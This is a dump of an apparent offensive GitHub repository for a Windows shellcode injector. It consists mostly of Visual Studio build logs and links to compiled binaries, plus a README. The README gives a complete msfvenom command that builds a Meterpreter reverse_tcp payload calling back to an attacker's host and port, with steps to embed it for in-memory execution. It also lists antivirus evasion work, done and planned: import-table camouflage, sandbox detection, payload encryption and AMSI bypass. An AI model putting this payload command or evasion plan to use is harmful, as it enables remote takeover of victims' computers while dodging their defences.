/ProcessInjectionTest/ProcessInjectionTest/x64/Release/ProcessI.dc860221.tlog/link.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Nicolas-Arsenault/run-shellcode-in-memory/55f4d16d7758adaf4e3b952fffdd46c474d2b8c0/ProcessInjectionTest/ProcessInjectionTest/x64/Release/ProcessI.dc860221.tlog/link.command.1.tlog


--------------------------------------------------------------------------------
/ProcessInjectionTest/ProcessInjectionTest/x64/Release/ProcessI.dc860221.tlog/link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Nicolas-Arsenault/run-shellcode-in-memory/55f4d16d7758adaf4e3b952fffdd46c474d2b8c0/ProcessInjectionTest/ProcessInjectionTest/x64/Release/ProcessI.dc860221.tlog/link.read.1.tlog


--------------------------------------------------------------------------------
/ProcessInjectionTest/ProcessInjectionTest/x64/Release/ProcessI.dc860221.tlog/link.secondary.1.tlog:
--------------------------------------------------------------------------------
1 | ^C:\USERS\RATATOUILLE\SOURCE\REPOS\PROCESSINJECTIONTEST\PROCESSINJECTIONTEST\X64\RELEASE\PROCESSINJECTIONTEST.OBJ
2 | C:\Users\Ratatouille\source\repos\ProcessInjectionTest\ProcessInjectionTest\x64\Release\ProcessInjectionTest.IPDB
3 | C:\Users\Ratatouille\source\repos\ProcessInjectionTest\ProcessInjectionTest\x64\Release\ProcessInjectionTest.iobj
4 | 


--------------------------------------------------------------------------------
/ProcessInjectionTest/ProcessInjectionTest/x64/Release/ProcessI.dc860221.tlog/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Nicolas-Arsenault/run-shellcode-in-memory/55f4d16d7758adaf4e3b952fffdd46c474d2b8c0/ProcessInjectionTest/ProcessInjectionTest/x64/Release/ProcessI.dc860221.tlog/link.write.1.tlog


--------------------------------------------------------------------------------
/ProcessInjectionTest/ProcessInjectionTest/x64/Release/ProcessInjectionTest.exe.recipe:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project>
 3 |   <ProjectOutputs>
 4 |     <ProjectOutput>
 5 |       <FullPath>C:\Users\Ratatouille\source\repos\ProcessInjectionTest\x64\Release\ProcessInjectionTest.exe</FullPath>
 6 |     </ProjectOutput>
 7 |   </ProjectOutputs>
 8 |   <ContentFiles />
 9 |   <SatelliteDlls />
10 |   <NonRecipeFileRefs />
11 | </Project>


--------------------------------------------------------------------------------
/ProcessInjectionTest/ProcessInjectionTest/x64/Release/ProcessInjectionTest.iobj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Nicolas-Arsenault/run-shellcode-in-memory/55f4d16d7758adaf4e3b952fffdd46c474d2b8c0/ProcessInjectionTest/ProcessInjectionTest/x64/Release/ProcessInjectionTest.iobj


--------------------------------------------------------------------------------
/ProcessInjectionTest/ProcessInjectionTest/x64/Release/ProcessInjectionTest.ipdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Nicolas-Arsenault/run-shellcode-in-memory/55f4d16d7758adaf4e3b952fffdd46c474d2b8c0/ProcessInjectionTest/ProcessInjectionTest/x64/Release/ProcessInjectionTest.ipdb


--------------------------------------------------------------------------------
/ProcessInjectionTest/ProcessInjectionTest/x64/Release/ProcessInjectionTest.log:
--------------------------------------------------------------------------------
1 |   ProcessInjectionTest.cpp
2 | C:\Users\Ratatouille\source\repos\ProcessInjectionTest\ProcessInjectionTest\ProcessInjectionTest.cpp(141,15): warning C4244: 'argument' : conversion de 'time_t' en 'unsigned int', perte possible de données
3 |   Génération de code en cours
4 |   6 of 20 functions (30.0%) were compiled, the rest were copied from previous compilation.
5 |     2 functions were new in current compilation
6 |     0 functions had inline decision re-evaluated but remain unchanged
7 |   Fin de la génération du code
8 |   ProcessInjectionTest.vcxproj -> C:\Users\Ratatouille\source\repos\ProcessInjectionTest\x64\Release\ProcessInjectionTest.exe
9 | 


--------------------------------------------------------------------------------
/ProcessInjectionTest/ProcessInjectionTest/x64/Release/ProcessInjectionTest.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Nicolas-Arsenault/run-shellcode-in-memory/55f4d16d7758adaf4e3b952fffdd46c474d2b8c0/ProcessInjectionTest/ProcessInjectionTest/x64/Release/ProcessInjectionTest.obj


--------------------------------------------------------------------------------
/ProcessInjectionTest/ProcessInjectionTest/x64/Release/vc143.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Nicolas-Arsenault/run-shellcode-in-memory/55f4d16d7758adaf4e3b952fffdd46c474d2b8c0/ProcessInjectionTest/ProcessInjectionTest/x64/Release/vc143.pdb


--------------------------------------------------------------------------------
/ProcessInjectionTest/x64/Debug/ProcessInjectionTest.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Nicolas-Arsenault/run-shellcode-in-memory/55f4d16d7758adaf4e3b952fffdd46c474d2b8c0/ProcessInjectionTest/x64/Debug/ProcessInjectionTest.exe


--------------------------------------------------------------------------------
/ProcessInjectionTest/x64/Debug/ProcessInjectionTest.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Nicolas-Arsenault/run-shellcode-in-memory/55f4d16d7758adaf4e3b952fffdd46c474d2b8c0/ProcessInjectionTest/x64/Debug/ProcessInjectionTest.pdb


--------------------------------------------------------------------------------
/ProcessInjectionTest/x64/Release/ProcessInjectionTest.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Nicolas-Arsenault/run-shellcode-in-memory/55f4d16d7758adaf4e3b952fffdd46c474d2b8c0/ProcessInjectionTest/x64/Release/ProcessInjectionTest.exe


--------------------------------------------------------------------------------
/ProcessInjectionTest/x64/Release/ProcessInjectionTest.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Nicolas-Arsenault/run-shellcode-in-memory/55f4d16d7758adaf4e3b952fffdd46c474d2b8c0/ProcessInjectionTest/x64/Release/ProcessInjectionTest.pdb


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Injector
 2 | ### instructions
 3 | 1. Gen your msfvenom shellcode :
 4 | `msfvenom -platform windows --arch x64 -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.67 LPORT=4444 -f c --var-name=wannabe`
 5 | 2. Put your shellcode in the `wannabe` variable.
 6 | 
 7 | ### UPDATES 
 8 | - Added IAT camouflage
 9 | - Added Force loading kernel32.dll
10 | - More to come.. need to bypass runtime...
11 | 
12 | ### To do
13 | - Add Sanbox detection (behavioral evasion)
14 | - Add payload encryption and decryption (static bypass)
15 | - Bypass execution (amsi + api unhooking)
16 | - Get shellcode from exe file and saving it in the var
17 | - UI
18 | 
19 | ### Warning
20 | This does not bypass AV as of now, we did not implement anything for it. If you want to contribute and add it, feel  free to do so.
21 | This is simply to play with memory allocation and execution. 
22 | 


--------------------------------------------------------------------------------